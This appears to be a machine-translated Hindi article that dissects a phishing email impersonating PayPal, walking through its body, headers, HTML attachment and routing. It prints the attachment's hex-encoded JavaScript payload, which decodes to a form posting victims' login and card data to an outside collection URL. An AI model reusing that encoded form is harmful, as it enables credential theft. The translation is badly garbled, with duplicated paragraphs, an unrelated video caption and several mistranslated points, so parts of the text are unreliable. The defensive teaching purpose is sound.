ऑनलाइन सुरक्षा: फ़िशिंग ईमेल की एनाटॉमी को तोड़ना

विषयसूची:

ऑनलाइन सुरक्षा: फ़िशिंग ईमेल की एनाटॉमी को तोड़ना
ऑनलाइन सुरक्षा: फ़िशिंग ईमेल की एनाटॉमी को तोड़ना

वीडियो: ऑनलाइन सुरक्षा: फ़िशिंग ईमेल की एनाटॉमी को तोड़ना

वीडियो: ऑनलाइन सुरक्षा: फ़िशिंग ईमेल की एनाटॉमी को तोड़ना
वीडियो: How to use the navigation pane in Word to move sections around - YouTube 2024, अप्रैल
Anonim
 आज की दुनिया में जहां हर किसी की जानकारी ऑनलाइन होती है, फ़िशिंग सबसे लोकप्रिय और विनाशकारी ऑनलाइन हमलों में से एक है, क्योंकि आप हमेशा वायरस को साफ कर सकते हैं, लेकिन यदि आपके बैंकिंग विवरण चोरी हो जाते हैं, तो आप परेशानी में हैं। हमें प्राप्त एक ऐसे हमले का टूटना यहां दिया गया है।
आज की दुनिया में जहां हर किसी की जानकारी ऑनलाइन होती है, फ़िशिंग सबसे लोकप्रिय और विनाशकारी ऑनलाइन हमलों में से एक है, क्योंकि आप हमेशा वायरस को साफ कर सकते हैं, लेकिन यदि आपके बैंकिंग विवरण चोरी हो जाते हैं, तो आप परेशानी में हैं। हमें प्राप्त एक ऐसे हमले का टूटना यहां दिया गया है।

ऐसा मत सोचो कि यह केवल आपके बैंकिंग विवरण हैं जो महत्वपूर्ण हैं: आखिरकार, अगर किसी को आपके खाते के लॉगिन पर नियंत्रण प्राप्त होता है तो वे न केवल उस खाते में निहित जानकारी को जानते हैं, लेकिन बाधाएं हैं कि एक ही लॉगिन जानकारी का इस्तेमाल कई अन्य पर किया जा सकता है हिसाब किताब। और यदि वे आपके ईमेल खाते से समझौता करते हैं, तो वे आपके सभी अन्य पासवर्ड रीसेट कर सकते हैं।

तो मजबूत और अलग-अलग पासवर्ड रखने के अलावा, आपको हमेशा वास्तविक चीज़ के रूप में नकली ईमेल के लिए तलाश करना होगा। जबकि अधिकांश फ़िशिंग प्रयास शौकिया हैं, कुछ काफी समझदार हैं, इसलिए यह समझना महत्वपूर्ण है कि सतह के स्तर पर उन्हें कैसे पहचानें और साथ ही वे हुड के नीचे कैसे काम करते हैं।

Asirap द्वारा छवि

सादा दृष्टि में क्या जांच है

हमारे उदाहरण ईमेल, अधिकांश फ़िशिंग प्रयासों की तरह, आपको अपने पेपैल खाते पर गतिविधि की "सूचित करता है" जो सामान्य परिस्थितियों में खतरनाक हो सकता है। तो कॉल टू एक्शन केवल व्यक्तिगत जानकारी के हर टुकड़े को सबमिट करके अपने खाते को सत्यापित / पुनर्स्थापित करना है जिसे आप सोच सकते हैं। फिर, यह सुंदर सूत्र है।

हालांकि निश्चित रूप से अपवाद हैं, हर फिशिंग और घोटाले ईमेल को सीधे संदेश में लाल झंडे से भरा हुआ है। यहां तक कि यदि पाठ दृढ़ता से है, तो आप आमतौर पर संदेश संदेश भर में कई गलतियां पा सकते हैं जो इंगित करते हैं कि संदेश वैध नहीं है।

संदेश बॉडी

पहली नज़र में, यह मैंने देखा है कि बेहतर फिशिंग ईमेल में से एक है। कोई वर्तनी या व्याकरण संबंधी गलतियां नहीं हैं और शब्दकोष जो आप उम्मीद कर सकते हैं उसके अनुसार पढ़ता है। हालांकि, कुछ लाल झंडे हैं जो आप देख सकते हैं जब आप सामग्री की थोड़ी अधिक बारीकी से जांच करते हैं।
पहली नज़र में, यह मैंने देखा है कि बेहतर फिशिंग ईमेल में से एक है। कोई वर्तनी या व्याकरण संबंधी गलतियां नहीं हैं और शब्दकोष जो आप उम्मीद कर सकते हैं उसके अनुसार पढ़ता है। हालांकि, कुछ लाल झंडे हैं जो आप देख सकते हैं जब आप सामग्री की थोड़ी अधिक बारीकी से जांच करते हैं।
  • "पेपैल" - सही मामला "पेपैल" (पूंजी पी) है। आप संदेश में दोनों भिन्नताओं का उपयोग कर सकते हैं। कंपनियां अपने ब्रांडिंग के साथ बहुत जानबूझकर हैं, इसलिए यह संदेहजनक है कि ऐसा कुछ सबूत प्रक्रिया को पार करेगा।
  • "ActiveX को अनुमति दें" - आपने कितनी बार एक कानूनी वेब आधारित व्यवसाय देखा है, पेपैल का आकार एक मालिकाना घटक का उपयोग करता है जो केवल एक ब्राउज़र पर काम करता है, खासकर जब वे एकाधिक ब्राउज़रों का समर्थन करते हैं? निश्चित रूप से, कहीं बाहर कुछ कंपनी करता है, लेकिन यह एक लाल झंडा है।
  • "सुरक्षित रूप से।" - ध्यान दें कि यह शब्द शेष अनुच्छेद पाठ के साथ मार्जिन में कैसे नहीं चलता है। यहां तक कि अगर मैं खिड़की को थोड़ा और बढ़ाता हूं, तो यह सही ढंग से लपेटता या स्थान नहीं लेता है।
  • "पेपैल!" - विस्मयादिबोधक चिह्न से पहले की जगह अजीब लगती है। बस एक और quirk जो मुझे यकीन है कि एक कानूनी ईमेल में नहीं होगा।
  • "पेपैल- खाता अपडेट फॉर्म.pdf.htm" - पेपैल क्यों "पीडीएफ" संलग्न करेगा, खासकर जब वे सिर्फ अपनी साइट पर किसी पृष्ठ से लिंक कर सकते हैं? इसके अतिरिक्त, वे एक HTML फ़ाइल को पीडीएफ के रूप में छिपाने का प्रयास क्यों करेंगे? यह उन सभी का सबसे बड़ा लाल झंडा है।

संदेश हैडर

जब आप संदेश शीर्षलेख पर नज़र डालते हैं, तो कुछ और लाल झंडे दिखाई देते हैं:
जब आप संदेश शीर्षलेख पर नज़र डालते हैं, तो कुछ और लाल झंडे दिखाई देते हैं:
  • पते से [email protected] है।
  • पता पता गुम है। मैंने इसे खाली नहीं किया, यह बस मानक संदेश शीर्षलेख का हिस्सा नहीं है। आम तौर पर एक कंपनी जिसका नाम है, वह आपको ईमेल को वैयक्तिकृत करेगा।

संलगन

जब मैं अनुलग्नक खोलता हूं, तो आप तुरंत देख सकते हैं कि लेआउट सही नहीं है क्योंकि इसमें शैली की जानकारी गुम है। फिर, पेपैल एक HTML फॉर्म क्यों ईमेल करेगा जब वे आपको बस अपनी साइट पर एक लिंक दे सकते हैं?

ध्यान दें: हमने इसके लिए जीमेल के अंतर्निहित एचटीएमएल अटैचमेंट व्यूअर का इस्तेमाल किया, लेकिन हम अनुशंसा करेंगे कि आप स्कैमर से अनुलग्नक न खोलें। कभी नहीँ। कभी। उनमें अक्सर शोषण होते हैं जो आपके पीसी पर ट्रोजन को आपके खाते की जानकारी चुराने के लिए इंस्टॉल करेंगे।

थोड़ा और नीचे स्क्रॉल करना आप देख सकते हैं कि यह फ़ॉर्म न केवल हमारी पेपैल लॉगिन जानकारी के लिए, बल्कि बैंकिंग और क्रेडिट कार्ड की जानकारी के लिए भी पूछता है। कुछ छवियों को तोड़ दिया गया है।
थोड़ा और नीचे स्क्रॉल करना आप देख सकते हैं कि यह फ़ॉर्म न केवल हमारी पेपैल लॉगिन जानकारी के लिए, बल्कि बैंकिंग और क्रेडिट कार्ड की जानकारी के लिए भी पूछता है। कुछ छवियों को तोड़ दिया गया है।
यह स्पष्ट है कि यह फ़िशिंग प्रयास एक सबूत के साथ सब कुछ के बाद जा रहा है।
यह स्पष्ट है कि यह फ़िशिंग प्रयास एक सबूत के साथ सब कुछ के बाद जा रहा है।

तकनीकी टूटना

हालांकि यह स्पष्ट रूप से स्पष्ट होना चाहिए कि सादे दृष्टि में क्या है कि यह एक फिशिंग प्रयास है, अब हम ईमेल के तकनीकी मेकअप को तोड़ने जा रहे हैं और देखें कि हम क्या पा सकते हैं।

अनुलग्नक से जानकारी

पहली बार एक अटैचमेंट फॉर्म का HTML स्रोत है जो फर्जी साइट पर डेटा सबमिट करता है।

स्रोत को तुरंत देखते समय, सभी लिंक वैध दिखाई देते हैं क्योंकि वे या तो "paypal.com" या "paypalobjects.com" को इंगित करते हैं जो दोनों कानूनी हैं।

अब हम पेज पर इकट्ठा कुछ मूल पृष्ठ जानकारी फ़ायरफ़ॉक्स पर एक नज़र डालने जा रहे हैं।
अब हम पेज पर इकट्ठा कुछ मूल पृष्ठ जानकारी फ़ायरफ़ॉक्स पर एक नज़र डालने जा रहे हैं।
जैसा कि आप देख सकते हैं, कुछ ग्राफिक्स कानूनी पेपैल डोमेन के बजाय डोमेन "धन्यtobe.com", "goodhealthpharmacy.com" और "pic-upload.de" डोमेन से खींचे जाते हैं।
जैसा कि आप देख सकते हैं, कुछ ग्राफिक्स कानूनी पेपैल डोमेन के बजाय डोमेन "धन्यtobe.com", "goodhealthpharmacy.com" और "pic-upload.de" डोमेन से खींचे जाते हैं।
Image
Image

ईमेल हेडर से जानकारी

इसके बाद हम कच्चे ईमेल संदेश शीर्षकों पर एक नज़र डालेंगे। जीमेल यह संदेश पर मूल मेनू विकल्प दिखाएँ के माध्यम से उपलब्ध कराता है।

मूल संदेश के लिए हेडर जानकारी को देखते हुए, आप देख सकते हैं कि यह संदेश आउटलुक एक्सप्रेस 6 का उपयोग करके बनाया गया था। मुझे संदेह है कि पेपैल में कर्मचारियों पर कोई है जो इन संदेशों में से प्रत्येक को मैन्युअल रूप से पुराने ईमेल क्लाइंट के माध्यम से भेजता है।
मूल संदेश के लिए हेडर जानकारी को देखते हुए, आप देख सकते हैं कि यह संदेश आउटलुक एक्सप्रेस 6 का उपयोग करके बनाया गया था। मुझे संदेह है कि पेपैल में कर्मचारियों पर कोई है जो इन संदेशों में से प्रत्येक को मैन्युअल रूप से पुराने ईमेल क्लाइंट के माध्यम से भेजता है।
अब रूटिंग जानकारी को देखते हुए, हम प्रेषक और रिलेइंग मेल सर्वर दोनों का आईपी पता देख सकते हैं।
अब रूटिंग जानकारी को देखते हुए, हम प्रेषक और रिलेइंग मेल सर्वर दोनों का आईपी पता देख सकते हैं।
"उपयोगकर्ता" आईपी पता मूल प्रेषक है। आईपी सूचना पर त्वरित लुकअप करना, हम देख सकते हैं कि प्रेषण आईपी जर्मनी में है।
"उपयोगकर्ता" आईपी पता मूल प्रेषक है। आईपी सूचना पर त्वरित लुकअप करना, हम देख सकते हैं कि प्रेषण आईपी जर्मनी में है।
और जब हम रिलेइंग मेल सर्वर (mail.itak.at) देखते हैं, आईपी पता हम देख सकते हैं कि यह ऑस्ट्रिया में स्थित एक आईएसपी है। मुझे संदेह है कि पेपैल ऑस्ट्रिया स्थित आईएसपी के माध्यम से सीधे अपने ईमेल रूट करता है जब उनके पास एक विशाल सर्वर फार्म होता है जो आसानी से इस कार्य को संभाल सकता है।
और जब हम रिलेइंग मेल सर्वर (mail.itak.at) देखते हैं, आईपी पता हम देख सकते हैं कि यह ऑस्ट्रिया में स्थित एक आईएसपी है। मुझे संदेह है कि पेपैल ऑस्ट्रिया स्थित आईएसपी के माध्यम से सीधे अपने ईमेल रूट करता है जब उनके पास एक विशाल सर्वर फार्म होता है जो आसानी से इस कार्य को संभाल सकता है।
Image
Image

डेटा कहां जाता है?

इसलिए हमने स्पष्ट रूप से यह निर्धारित किया है कि यह एक फ़िशिंग ईमेल है और इस बारे में कुछ जानकारी एकत्र की है कि संदेश कहां से आया था, लेकिन आपका डेटा कहां भेजा गया है इसके बारे में क्या?

इसे देखने के लिए, हमें पहले एचटीएम अटैचमेंट को अपना डेस्कटॉप करना होगा और टेक्स्ट एडिटर में खोलना होगा। इसके माध्यम से स्क्रॉल करना, सबकुछ क्रम में प्रतीत होता है जब हम किसी संदिग्ध दिखने वाले जावास्क्रिप्ट ब्लॉक को छोड़ देते हैं।

जावास्क्रिप्ट के अंतिम ब्लॉक के पूर्ण स्रोत को तोड़कर, हम देखते हैं:
जावास्क्रिप्ट के अंतिम ब्लॉक के पूर्ण स्रोत को तोड़कर, हम देखते हैं:

किसी भी समय जब आप जावास्क्रिप्ट ब्लॉक में एम्बेडेड प्रतीत होता है यादृच्छिक अक्षरों और संख्याओं की एक बड़ी जुआ वाली स्ट्रिंग देखते हैं, तो यह आमतौर पर कुछ संदिग्ध होता है। कोड को देखते हुए, चर "x" को इस बड़े स्ट्रिंग पर सेट किया गया है और फिर चर "y" में डीकोड किया गया है। परिवर्तनीय "वाई" का अंतिम परिणाम तब दस्तावेज़ के लिए HTML के रूप में लिखा जाता है।

चूंकि बड़ी स्ट्रिंग संख्या 0-9 और अक्षर ए-एफ से बना है, इसलिए यह संभवतः हेक्स रूपांतरण के लिए एक साधारण ASCII के माध्यम से एन्कोड किया गया है:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

अनुवाद करता है:

यह एक संयोग नहीं है कि यह एक वैध HTML फॉर्म टैग में डीकोड करता है जो परिणाम पेपैल को नहीं भेजता है, बल्कि एक दुष्ट साइट पर भेजता है।

इसके अतिरिक्त, जब आप फ़ॉर्म के HTML स्रोत को देखते हैं, तो आप देखेंगे कि यह फ़ॉर्म टैग दृश्यमान नहीं है क्योंकि यह जावास्क्रिप्ट के माध्यम से गतिशील रूप से जेनरेट किया गया है। एचटीएमएल वास्तव में क्या कर रहा है यह छिपाने का एक चालाक तरीका है अगर किसी को सीधे संलग्नक के जेनरेट किए गए स्रोत को देखना था (जैसा कि हमने पहले किया था) जैसा कि सीधे टेक्स्ट एडिटर में अटैचमेंट खोलने के विपरीत था।

आपत्तिजनक साइट पर एक त्वरित जोइस चलाना, हम देख सकते हैं कि यह एक लोकप्रिय वेब होस्ट, 1and1 पर होस्ट किया गया एक डोमेन है।
आपत्तिजनक साइट पर एक त्वरित जोइस चलाना, हम देख सकते हैं कि यह एक लोकप्रिय वेब होस्ट, 1and1 पर होस्ट किया गया एक डोमेन है।
क्या खड़ा है कि डोमेन एक पठनीय नाम का उपयोग करता है (जैसा कि "dfh3sjhskjhw.net" जैसा कुछ है) और डोमेन 4 वर्षों से पंजीकृत है। इस वजह से, मेरा मानना है कि इस डोमेन को अपहरण कर लिया गया था और इस फ़िशिंग प्रयास में एक पंख के रूप में उपयोग किया गया था।
क्या खड़ा है कि डोमेन एक पठनीय नाम का उपयोग करता है (जैसा कि "dfh3sjhskjhw.net" जैसा कुछ है) और डोमेन 4 वर्षों से पंजीकृत है। इस वजह से, मेरा मानना है कि इस डोमेन को अपहरण कर लिया गया था और इस फ़िशिंग प्रयास में एक पंख के रूप में उपयोग किया गया था।

विज्ञानवाद एक अच्छा बचाव है

जब ऑनलाइन सुरक्षित रहने की बात आती है, तो यह कभी भी संदिग्धता का थोड़ा सा दर्द नहीं होता है।

हालांकि मुझे यकीन है कि उदाहरण ईमेल में और अधिक लाल झंडे हैं, हमने ऊपर जो बताया है वह संकेतक हैं जिन्हें हमने कुछ ही मिनटों के बाद देखा था। Hypothetically, अगर ईमेल के सतह के स्तर ने अपने वैध समकक्ष 100% नकल की, तो तकनीकी विश्लेषण अभी भी अपनी असली प्रकृति को प्रकट करेगा। यही कारण है कि यह आयात करने में सक्षम होने के लिए आयात किया जा सकता है कि आप क्या कर सकते हैं और देख नहीं सकते हैं।

सिफारिश की: